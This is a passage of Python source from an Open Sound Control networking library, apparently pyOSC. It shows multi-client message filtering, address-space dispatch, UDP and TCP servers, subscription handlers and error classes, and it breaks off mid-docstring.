def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in list(self.targets.items()):
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
def _filterMessage(self, filters, msg):
"""Checks the given OSCMessge against the given filters.
'filters' is a dict containing OSC-address:bool pairs.
If 'msg' is an OSCBundle, recursively filters its constituents.
Returns None if the message is to be filtered, else returns the message.
or
Returns a copy of the OSCBundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = list(out.values())
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in list(filters.keys()):
if filters['/*']:
out = msg
else:
out = None
elif False in list(filters.values()):
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in list(filters.keys()):
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
def _prefixAddress(self, prefix, msg):
"""Makes a copy of the given OSCMessage, then prepends the given prefix to
The message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = list(out.values())
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in list(self.targets.items()):
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
out = self._prefixAddress(prefix, msg)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
def getOSCAddressSpace(self):
"""Returns a list containing all OSC-addresses registerd with this Server.
"""
return list(self.callbacks.keys())
def dispatchMessage(self, pattern, tags, data, client_address):
"""Attmept to match the given OSC-address pattern, which may contain '*',
against all callbacks registered with the OSCServer.
Calls the matching callback and returns whatever it returns.
If no match is found, and a 'default' callback is registered, it calls that one,
or raises NoCallbackError if a 'default' callback is not registered.
- pattern (string): The OSC-address of the receied message
- tags (string): The OSC-typetags of the receied message's arguments, without ','
- data (list): The message arguments
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in list(self.callbacks.keys()):
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
The OSC address-pattern is matched against a set of OSC-adresses
that have been registered to the server with a callback-function.
If the adress-pattern of the message machtes the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.socket = self.socket.dup()
client.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, client.sndbuf_size)
client._fd = client.socket.fileno()
client.server = self
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
if self.client != None:
self.client.close()
self.client = client
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
return cmp(self.socket._sock, other.socket._sock)
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
the given prefix is prepended to all other callbacks registered by this method:
- '<prefix><info_prefix' -> serverInfo_handler
- '<prefix><error_prefix> -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the used Client supports it;
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
def sendOSCerror(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
def sendOSCinfo(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
self.printErr(txt) # strip trailing comma & space
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in list(self.callbacks.keys()):
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
def _subscribe(self, data, client_address):
"""Handle the actual subscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
parseUrlStr() & parseFilterStr() to actually retreive <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (isinstance(item,int)) and not have_port:
url += ":%d" % item
have_port = True
elif isinstance(item,str):
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
def _unsubscribe(self, data, client_address):
"""Handle the actual unsubscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>]' string, which is then passed to
parseUrlStr() to actually retreive <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (isinstance(item,int)) and not have_port:
url += ":%d" % item
have_port = True
elif isinstance(item,str):
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError as e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subsctiptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates a OSCStreamRequestHandler
for each new connection. This is fundamentally different to a packet
oriented server which has a single address space for all connections.
This connection based (streaming) OSC server maintains an address space
for each single connection, because usually tcp server spawn a new thread
or process for each new connection. This would generate severe
multithreading synchronization problems when each thread would operate on
the same address space object. Therefore: To implement a streaming/TCP OSC
server a custom handler must be implemented which implements the
setupAddressSpace member in which it creates its own address space for this
very connection. This has been done within the testbench and can serve as
inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print("SERVER: New client connection.")
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print("SERVER: Client connection handled.")
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error as e:
if e[0] == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end should be closed in the meanwhile None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receive(4)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# set socket blocking to avoid "resource currently not available"
# exceptions, because the connection socket inherits the settings
# from the listening socket and this times out from time to time
# in order to provide a way to shut the server down. But we want
# clean and blocking behaviour here
self.connection.settimeout(None)
print("SERVER: Entered server loop")
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print("OSC stream server: Spurious message received.")
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error as e:
if e[0] == errno.ECONNRESET:
# if connection has been reset by client, we do not care much
# about it, we just assume our duty fullfilled
print("SERVER: Connection has been reset by peer.")
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
over the client/server connection. It is thread save.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so called processing queue in which
all pending messages or subbundles are inserted to be processed in the future).
When a subbundle or message gets queued, a mechanism must be provided that
those messages get invoked when time asks for them. There are the following
opportunities:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
pass
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken since the OSC address space is for all
the same.
"""
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
